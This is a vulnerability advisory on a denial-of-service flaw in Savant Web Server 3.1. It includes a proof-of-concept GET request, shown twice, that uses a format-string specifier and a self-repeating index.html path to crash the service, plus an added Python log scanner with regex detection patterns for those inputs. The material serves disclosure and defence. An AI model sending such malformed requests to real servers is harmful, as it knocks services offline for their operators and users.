DESCRIPTION

"Savant is a full-featured open source / freeware web server designed to be run under any 32-bit version of Microsoft Windows (including Windows 95, 98, ME, XP, NT, and 2000). Savant was designed to be easy to use, fast, and secure."

More information at http://savant.sourceforge.net.

SUMMARY

PRODUCT: Savant Web Server
VENDOR: Open source
AFFECTED VERSIONS: Savant Web Server 3.1
SEVERITY:
IDENTIFIER: N/A
TESTED PLATFORM: Windows 2000 Professional

IMPACT

Denial of service.

DETAILS

[Vulnerability #1] DoS with malformed GET requests

Sending a GET request that contains a format string specifier character, such as /%x, /%f, /%I, and /%n, to Savant Web Server crashes the service, which pops up a dialog box saying "invalid memory reference". The Savant general log files show that the file index.html keeps redirecting to itself, causing an infinite loop until the HTTP service can no longer handle the request and crashes.

GET /%x/index.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.html index.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex. htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.html
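For operators who have to keep an affected server running, the two symptoms described above can be looked for in request logs. The following is an added detection example, not part of the original advisory or of Savant: it flags request paths with a "%" that does not begin a valid two-hex-digit escape (which covers /%x, /%f, /%I and /%n) and paths where index.html is appended to itself. The log line layout, the repeat threshold of three, and the function names are assumptions; the sample entries are constructed.

```python
import re

# A '%' that does not start a valid two-hex-digit escape (e.g. %x/, %n, %I).
BAD_ESCAPE = re.compile(r"%(?![0-9A-Fa-f]{2})")
# The looping pattern from the advisory's log excerpt: the index file name
# appended to itself in one path. The threshold of 3 is an assumption.
REPEATED_INDEX = re.compile(r"(?:index\.html){3,}", re.IGNORECASE)
# Request line inside a log entry; the quoted layout is an assumption.
REQUEST = re.compile(r'"?(GET|HEAD|POST) (\S+)')


def classify(log_line):
    """Return a list of reasons the request in log_line looks suspicious."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    path = m.group(2)
    reasons = []
    if BAD_ESCAPE.search(path):
        reasons.append("invalid-percent-escape")
    if REPEATED_INDEX.search(path):
        reasons.append("index-redirect-loop")
    return reasons


def scan(lines):
    """Return (line_number, reasons) for every flagged entry."""
    return [(n, r) for n, line in enumerate(lines, 1) if (r := classify(line))]


# Constructed sample entries (not taken from a real Savant log).
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2003:10:00:00] "GET /index.html HTTP/1.0" 200',
    '192.0.2.10 - - [01/Jan/2003:10:00:05] "GET /docs/a%20b.html HTTP/1.0" 200',
    '192.0.2.77 - - [01/Jan/2003:10:01:00] "GET /%n HTTP/1.0" -',
    '192.0.2.77 - - [01/Jan/2003:10:01:02] '
    '"GET /%x/index.htmlindex.htmlindex.html HTTP/1.0" -',
]

if __name__ == "__main__":
    for number, reasons in scan(SAMPLE):
        print(number, ", ".join(reasons))
```

The same two patterns can be used as reject rules in a reverse proxy or filter placed in front of the server, so that such requests never reach it.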

PROOF OF CONCEPT

GET /%x/index.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.html index.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex. htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.html

VENDOR STATUS

This same vulnerability report had also been sent to the vendor but I wasn't able to receive any acknowledgement from the vendor for a long time. So my best suggestion to Savant's users is to either disable Savant on your computer and wait for a newer release or just simply switch to another stable and secure web server.

CREDIT

Phuong Nguyen

DISCLOSURE TIMELINE

N/A

APPENDIX

N/A

REFERENCES

N/A